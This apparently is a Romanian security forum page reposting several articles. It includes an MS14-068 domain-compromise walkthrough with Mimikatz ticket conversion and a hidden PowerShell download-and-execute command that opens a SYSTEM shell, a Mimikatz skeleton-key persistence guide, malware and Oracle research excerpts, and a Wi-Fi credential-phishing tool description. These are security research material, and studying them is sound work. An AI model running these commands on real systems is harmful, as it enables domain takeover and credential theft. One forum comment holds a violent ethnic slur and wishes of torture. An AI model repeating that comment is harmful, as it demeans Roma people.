msfdc01.metasploitable.local... Done! [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! Although Mimikatz can load our ccache file using the kerberos::ptc command, at present the Meterpreter Kiwi module only has support for .kirbi files. We can convert our ccache file to kirbi using Mimikatz as follows: $ wine mimikatz.exe "kerberos::clist TGT_user01@metasploitable.local.ccache /export" exit p11-kit: couldn't load module: /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so: /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so: cannot open shared object file: No such file or directory err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution. fixme:msvcrt:MSVCRT__setmode fd (1) mode (0x00040000) unknown fixme:msvcrt:MSVCRT__setmode fd (2) mode (0x00040000) unknown .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 20 2014 01:35:31) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 15 modules * * */ fixme:lsa:LsaConnectUntrusted 0x42ba8c stub fixme:lsa:LsaLookupAuthenticationPackage (nil) 0x42b67c 0x42ba84 stub fixme:wlanapi:WlanOpenHandle (1, (nil), 0x30fdf8, 0x42bac8) stub mimikatz(commandline) # kerberos::clist TGT_user01@metasploitable.local.ccache /export Principal : (01) : Z ; @ Z Data 0 Start/End/MaxRenew: 10/12/2014 12:00:26 ; 10/12/2014 22:00:25 ; 17/12/2014 12:00:25 Service Name (01) : Z ; Z ; @ Z Target Name (01) : Z ; Z ; @ Z Client Name (01) : Z ; @ Z Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 09f49cffb2e13a13699fd40443a9fb88 Ticket : 0x00000000 - null ; kvno = 2 [...] * Saved to file 0-50a00000-user01@krbtgt-METASPLOITABLE.LOCAL.kirbi ! mimikatz(commandline) # exit Bye! fixme:lsa:LsaDeregisterLogonProcess (nil) stub Now we can load the Kiwi Mimikatz extension into meterpreter, install our ticket, and access resources as a Domain Administrator: meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.0 alpha (x86/win32) release "Kiwi en C" .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */ [!] Loaded x86 Kiwi on an x64 architecture. success. meterpreter > kerberos_ticket_use /root/git/pykek/0-50a00000-user01@krbtgt-METASPLOITABLE.LOCAL.kirbi [*] Using Kerberos ticket stored in /root/git/pykek/0-50a00000-user01@krbtgt-METASPLOITABLE.LOCAL.kirbi, 1231 bytes [+] Kerberos ticket applied successfully We can then use create a service remotely, like PSEXEC to get a reverse shell: meterpreter > shell Process 1132 created. Channel 2 created. Microsoft Windows [Version 6.3.9600] © 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32\WindowsPowerShell\v1.0>sc \\msfdc01\ create psh binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.3.76:8080/moKqrqIYh0'))" sc \\msfdc01\ create psh binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient). downloadstring('http://172.16.3.76:8080/moKqrqIYh0'))" [sC] CreateService SUCCESS C:\Windows\system32\WindowsPowerShell\v1.0>sc \\msfdc01\ start psh sc \\msfdc01\ start psh [sC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. C:\Windows\system32\WindowsPowerShell\v1.0>sc \\msfdc01\ delete psh sc \\msfdc01\ delete psh [sC] DeleteService SUCCESS C:\Windows\system32\WindowsPowerShell\v1.0>exit exit meterpreter > background [*] Backgrounding session 5... [*] [2014.12.10-13:10:28] 172.16.80.10 web_delivery - Delivering Payload [*] [2014.12.10-13:10:28] Sending stage (770048 bytes) to 172.16.80.10 [*] Meterpreter session 6 opened (172.16.3.76:8686 -> 172.16.80.10:63162) at 2014-12-10 13:10:31 +0000 20141210-13:10 - 192.168.153.135 exploit(current_user_psexec) > sessions -i 6 [*] Starting interaction with 6... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : MSFDC01 OS : Windows 2008 (Build 6002, Service Pack 2). Architecture : x86 System Language : en_GB Meterpreter : x86/win32 Pivoting native tools via Meterpreter to exploit this issue can prove difficult. Forwarding TCP port 445 allows you to use smbclient, however tools such as Winexe require ephemeral DCE-RPC ports so unless you are creating a VPN to your target this would be painful to use remotely. Hopefully more support for this soon. Also, it’s worth keeping your eye on the current_user_psexec module as it may simplify the post exploitation steps in future. We have made a pull request that introduces Kerberos support, by targeting hostnames instead of IP addresses, to this module: 20141210-22:17 - 192.168.153.133 exploit(current_user_psexec) > rerun [*] Reloading module... [*] [2014.12.10-22:17:22] Started reverse handler on 172.16.80.225:8888 [*] [2014.12.10-22:17:22] msfdc01 Creating service kWfrGWFDDd [*] [2014.12.10-22:17:23] msfdc01 Starting the service [*] [2014.12.10-22:17:24] msfdc01 Deleting the service [*] [2014.12.10-22:17:26] Sending stage (770048 bytes) to 172.16.80.10 [*] Meterpreter session 5 opened (172.16.80.225:8888 -> 172.16.80.10:63815) at 2014-12-10 22:17:43 +0000 Gotchas There are a few common issues that may prevent the MS14-068 exploits from working correctly. For example, if the DNS server isn’t resolving correctly you can have trouble authenticating with the Kerberos token. Here are a couple of tricks if you have problems exploiting the issue: Check your local system time is in sync with target Try with full domain name in CAPITALS, e.g. MSFDC01.METASPLOITABLE.LOCAL Try without the FQDN (i.e. just the Netbios name), e.g. msfdc01 or MSFDC01 Add the addresses to your /etc/hosts file Use Wireshark to check the DNS requests, you may see incorrect requests like MSFDC01.METASPLOITABLE.LOCAL.METASPLOITABLE.LOCAL How can I defend against this? The only solution for preventing this attack is to apply the patch. If this hasn’t been done already then it may be too late. Microsoft have indicated just how serious this issue is in their blog post giving additional information on the issue: Remediation The only way a domain compromise can be remediated with a high level of certainty is a complete rebuild of the domain. An attacker with administrative privilege on a domain controller can make a nearly unbounded number of changes to the system that can allow the attacker to persist their access long after the update has been installed. Therefore it is critical to install the update immediately. This guidance just highlights how important it is to apply security patches in a timely manner. In the same post, Microsoft provided advice on detecting exploitation of MS14-068. They indicated that login events with a mismatch between the SID and the account name had been observed in the wild. However, the public exploits that have been recently released do not have this same indicator when used correctly. Therefore, only those with well developed monitoring infrastructure are likely to identify any access anomalies that indicate compromise and attempts to exfiltrate data. This vulnerability demonstrates that if an organisation’s security relies heavily on a single control, such as whether the user is in a particular domain group, they are at risk from attackers defeating that control and gaining easy access to sensitive information. Security must come from understanding which assets are important, where they are located, and restricting routes to those assets so that, for example, a single compromised desktop cannot access them. The number of access routes to critical data should be minimized and hardened to prevent initial exploitation and local privilege escalation. They should also be heavily monitored for signs of compromise, such as accounts trying to access resources they shouldn’t or accounts being added to privileged groups, or early indicators of an attacker trying to gain a foothold, such as EMET or software restriction exceptions. Conclusion A key goal of attackers seeking to compromise a company’s assets is to escalate their privileges to make discovery and access to the information they seek easier. Therefore, a vulnerability such as MS14-068 is highly valuable to them as it allows total access to the domain from a simple phishing attack on a single desktop user. The fact that exploitation of this issue was found in the wild also shows that attackers are not just researching 0-days in browsers and file viewing software, but are also actively researching later stages of compromise such as lateral and vertical movement. MS14-068 is an exciting prospect for penetration testers as it may provide us with an easy privilege escalation route in engagements over the next few years. However, the worrying flip-side to this is that sensitive corporate and national networks are likely to be vulnerable to such an easy attack. Even worse, it will be difficult to be certain of the integrity of networks that have been patched. References Additional information about CVE-2014-6324 Microsoft Security Bulletin MS14-068 – Critical Microsoft Security Bulletin MS11-013 – Important MIT krb5 Security Advisory 2010-007 A Quick Look at MS14-068 mimikatz presentation by Benjamin Delpy – Passwords#14 MS-PAC: Privilege Attribute Certificate Data Structure Sursa: https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/

Nu e nevoie sa pui totul in EAX inainte de push. Iar eliberarea memoriei NU se face pentru WinAPI (ex, MessageBox) deoarece au calling convention __stdcall. Functiile din C au calling convention __cdecl si acolo e necesara acea secventa "pop ebx..." dar nu se face asa, se face mai rapid cu incrementarea ESP-ului: add ESP, 0x10 (adica 16 bytes). Info: 1. Calling Conventions Demystified - CodeProject 2. Using Win32 calling conventions

Vreau si eu Anti-Cacat, care sa ma scape de posturile astea ale voastre, inutile, penibile si de cacat.

Futu-i natia ma-sii de tigan borat, sa moara in puscarie. I-as taia mainile privindu-l in ochi cum sufera. De ce gatu' ma-sii nu munceste? Spiritul civic ar trebui sa va indemne sa vreti sa ii inchida pe gainarii astia. Asa cum ai patit tu, o sa pateasca si altii, daca nu mai rau. Nota: Unei persoane cunoscute (fata) i s-a pus cutitul la gat ca sa dea telefonul. Tot un recidivist. Grijania ma-sii, sa-l futa aia in cur in puscarie pana ii da sangele pe ochi.

Citeste o carte: http://sferon.dlinkddns.com/Pub/%D0%9B%D0%B8%D1%82%D0%B5%D1%80%D0%B0%D1%82%D1%83%D1%80%D0%B0/Evi%20Nemeth,%20Garth%20Snyder,%20Trent%20R.%20Hein%20-%20UNIX%20and%20Linux%20System%20Administration%20Handbook,%204th%20Edition%20-%202010.pdf @aelius

Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest Microsoft Security, Technical Reference by Sean Metcalf Once an attacker has gained Domain Admin rights to your Active Directory environment, there are several methods for keeping privileged access. Skeleton Key is an ideal persistence method for the modern attacker. More information on Skeleton Key is in my earlier post. Note that the behavior documented in this post was observed in a lab environment using the version of Mimikatz shown in the screenshot. There are likely differences in the Skeleton Key malware documented by Dell SecureWorks and the Mimikatz skeleton key functionality. Mimikatz effectively “patches” LSASS to enable use of a master password with any valid domain user. Rebooting the DC refreshes the memory which removes the “patch”. Implanting the Mimikatz Skeleton Key on one or multiple Domain Controllers: Mimikatz can now inject a skeleton key into LSASS on the Domain Controller by running the following command on the DC: mimikatz.exe “privilege::debug” “misc::skeleton” exit When there are multiple Domain Controllers in an Active Directory site, all of them need the Skeleton Key implant to ensure the skeleton key master password is accepted as the user’s valid password.. Since the client discovers a Domain Controller using DCLocator, the DC the client selects is effectively random. If all the DCs don’t have skeleton key configured, the master password won’t work when the client authenticates to a DC without skeleton key. Scenario: Either the attacker exploits MS14-068 or has the KRBTGT NTLM password hash and uses it to generate a Kerberos Golden Ticket to impersonate a valid Domain Admin account. The attacker leverages the forged Kerberos TGT ticket to access the Domain Controllers via PowerShell remoting. PowerShell remoting runs over WinRM and provides a shell running on the remote computer (much like SSH). In this case, the attacker runs a PowerShell script that uses “invoke-command” to run the mimikatz command on the DCs. Domain Controller Security Events When Implanting the Mimikatz Skeleton Key: When implanting the skeleton key remotely using Mimikatz the following events are logged on the Domain Controller. Event Id 4673 Sensitive Privilege Use, Event 4611: A trusted logon process has been registered with the Local Security Authority. If Process Tracking (logging) is enabled, there are two events that are logged reliably. Event 4688: A new process has been created. Event 4689: A new process has exited. Authenticating with the Mimikatz Skeleton Key: Testing user password and user account with skeleton key password. Note that both passwords are accepted – the valid user password and the skeleton key master password! Testing Domain Admin account with password & skeleton key password. Note that both passwords are accepted – the valid user password and the skeleton key master password! Skeleton Key Mitigation: Protect domain-level admin (DLA) accounts (Domain Admin, Administrators, etc) which reduces the risk of attackers gaining access to these credentials. Don’t let DLA accounts logon to systems at a different security level from Domain Controllers. Don’t let services run as Domain Admin on member servers that aren’t protected at the same level as DCs. Enable smart card authentication for all users. Ensure Domain Controllers have limited connectivity to the network until MS14-068 is patched (kb3011780). The challenge is that the patch has to be applied after DCPromo is complete. Security software that prevents LSASS patching may mitigate the issue. Application whitelisting (ex. AppLocker) can prevent unapproved applications from running on Domain Controllers. Enabling Process Logging on Domain Controllers provides additional data on what applications (exes) are executed on Domain Controllers. Enable LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should make some noise in the event logs): The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. To enable LSA protection on a single computer Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. Set the value of the registry key to: “RunAsPPL”=dword:00000001. Restart the computer. To enable LSA protection using Group Policy Open the Group Policy Management Console (GPMC). Create a new GPO that is linked at the domain level or that is linked to the organizational unit that contains your computer accounts. Or you can select a GPO that is already deployed. Right-click the GPO, and then click Edit to open the Group Policy Management Editor. Expand Computer Configuration, expand Preferences, and then expand Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa. In the Value name box, type RunAsPPL. In the Value type box, click the REG_DWORD. In the Value data box, type 00000001. Click OK. Mimikatz bypassing LSA Protection: Sursa: http://adsecurity.org/?p=1275

Dyre Infection Analysis by Alexander Hanel 2014/11/24 Version 1.0 alexander.hanel@gmail.com Executive SummaryIntroduction Family Name Propagation Sample Analyzed Installation Stage 1 stage 2 Stage 3 Stage 4 Stage 5 Stage 6 Stage 7 General Details and Functionality Persistence Registry Service Run Key Dropped Files Service Pipes Mutex Functionality Overview Enumerating processes Process Injection Host IP Retrieval VNC Commands & Configurations Commands & Configurations Error Codes Hooks FireFox Hooks Internet Explorer Hooks Chrome Hooks AntiDetection functionality Disabling RapportGP Command and Control Third Party Resources URLs & IPs Network Traffic Patterns Appendix: Strings Stage 6 Dyre Stage 7 Injected Process Third Party Analysis Executive Summary This document is an analysis of the Dyre banking malware. It is intended to aid in understanding how Dyre executes and interact with the operating system. The targeted audience is malware analyst, reverse engineers, system administrators, incident responders and forensic investigators. Hopefully an individual investigating an incident could use this document to determine if the infection is Dyre or not. Introduction Dyre is banking trojan that first was first seen in June of 2014. In terms of banking malware the family is rather recent. Most organizations and email providers have been hit with a spam campaigns that either links to an exploit kit that drops Drye or have been sent an email with a zip attachment that contains a Dyre executable. This document cover features of the Dyre that I found interesting. Due to the size of the code not all features are covered. The sample I originally started with was an older sample. Newer samples that dropped a service crashed in Download: https://bytebucket.org/Alexander_Hanel/papers/raw/1c41fd1ed30cdd060d18ceddb2d2e52db5134e45/Dyre-Analysis.pdf

Privilege EscalationviaOracle Indexes David Litchfield [david.litchfield@datacom.com.au] 21st January 2015 © Copyright Datacom TSS Datacom TSS Introduction To speed up querying of large datasets most database servers allow table data to be indexed. InOracle, in order to be able to create an index on a table, the user must either own the table, orhave the INDEX object privilege on the table, or have the CREATE ANY INDEX systemprivilege. If a user has either of these privileges, then a security hole is opened up whereby theycan execute arbitrary SQL as the owner of the table by creating a function-based index on thetable. If the table in question is owned by a highly privileged user such as SYS or SYSTEM thenthe database server becomes dangerously exposed as it provides the attacker the ability to fullycompromise the system.The PUBLIC role has (in the past) been granted the INDEX privilege on the following tables,product and options dependant: SYS.DUAL SYS.OLAPTABLEVELS SYS.OLAPTABLEVELTUPLES SYSTEM.OLAP_SESSION_CUBES SYSTEM.OLAP_SESSION_DIMS SYSTEM.PLAN_TABLE FLOWS_FILES.WWV_FLOW_FILE_OBJECT$ TOAD.TOAD_PLAN_TABLE Download: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf

OpenSSL 1.0.2 The Open Source toolkit for Secure Sockets Layer and Transport Layer Security on GNU/Linux OpenSSL is an open source command-line project based on the excellent SSLeay library created by Tim J. Hudson and Eric A. Young. It is designed as a feature-rich, sturdy and professional-grade toolkit that implements the Secure Sockets Layer (SSL version 2 and 3) and Transport Layer Security (TLS version 1) protocols. Implements a full-strength, general purpose cryptography library OpenSSL can also be used to implement full-strength, general purpose cryptography library, which can be used to create RSA, DSA and DH key parameters, X.509 certificates, CRLs and CSRs, calculate message digests, encrypt and decrypt files with ciphers, handle encrypted email or S/MIME signs, as well as SSL/TLS client and server tests. Integrates numerous commands Numerous commands have been integrated in the OpenSSL toolkit, which are available from its shell prompt. It includes standard, message digest or cipher commands, such as asn1parse, aes-128-cbc, pkeyutl, sha, sha1, md5, md4, rmd160, mdc2, aes-256-cbc, cast5-cbc, camellia-128-cbc, camellia-256-cbc, des-ofb, rc2, bf-cfb, seed, rc4-40, prime, pkcs8, ocsp, enc, dsa, srp, x509, spkac, nseq, crl, s_time, rsa, pkcs7 and crl2pkcs7. It’s managed by a worldwide community of volunteers At the moment, the OpenSSL project is in active development with regular releases. It’s managed by a community of volunteers from all over the world, who use the Internet to plan and develop this extraordinary project that helps us communicate more securely. Supports a wide-range of GNU/Linux operating systems The OpenSSL toolkit is supported on a wide-range of GNU/Linux operating system, including Debian, Ubuntu, Red Hat Enterprise Linux, CentOS, Fedora, Mageia or openSUSE. It’s available for download from its official website or via Softpedia as a source archive that allows you to configure, compile and install the program on any distribution. It can also be easily installed from the default software channels of your Linux distro, supporting both 32-bit and 64-bit architectures. Reviewed by Marius Nestor, last updated on January 23rd, 2015 Sursa: Download OpenSSL 1.0.2 for Linux - Softpedia

LINSET - WPA/WPA2 Hack Without Brute Force Lydecker Black on 7:03 PM How it works Scan the networks. Select network. Capture handshake (can be used without handshake) We choose one of several web interfaces tailored for me (thanks to the collaboration of the users) Mounts one FakeAP imitating the original A DHCP server is created on FakeAP It creates a DNS server to redirect all requests to the Host The web server with the selected interface is launched The mechanism is launched to check the validity of the passwords that will be introduced It deauthentificate all users of the network, hoping to connect to FakeAP and enter the password. The attack will stop after the correct password checking Are necessary tengais installed dependencies, which Linset check and indicate whether they are installed or not. It is also preferable that you still keep the patch for the negative channel, because if not, you will have complications relizar to attack correctly How to use $ chmod +x linset $ ./linset Download LINSET Sursa: LINSET - WPA/WPA2 Hack Without Brute Force | KitPloit

Pentru cei care nu stiu despre ce e vorba: Faceti update la Flash Player!

Adobe has released an advisory regarding an out of band security update for Flash, APSB15-02 1. It is a fix for CVE-2015-0310, which is reserved but for which there is little additional information at the NIST or Mitre sites. Most likely this is the previously reported 0day 2. There are reports that this vulnerability is actively being exploited, and that it is part of a crimeware kit. This would be a highly recommended patch! If you have the Adobe Flash Player installed apply the update. All versions on all platforms appear to be vulnerable. 1- Adobe Security Bulletin 2- https://isc.sans.edu/forums/diary/Flash+0Day+Exploit+Used+by+Angler+Exploit+Kit/19213/ Cheers, Adrien de Beaupré Intru-shun.ca Inc. My SANS teaching schedule Sursa: https://isc.sans.edu/forums/diary/OOB+Adobe+patch/19217/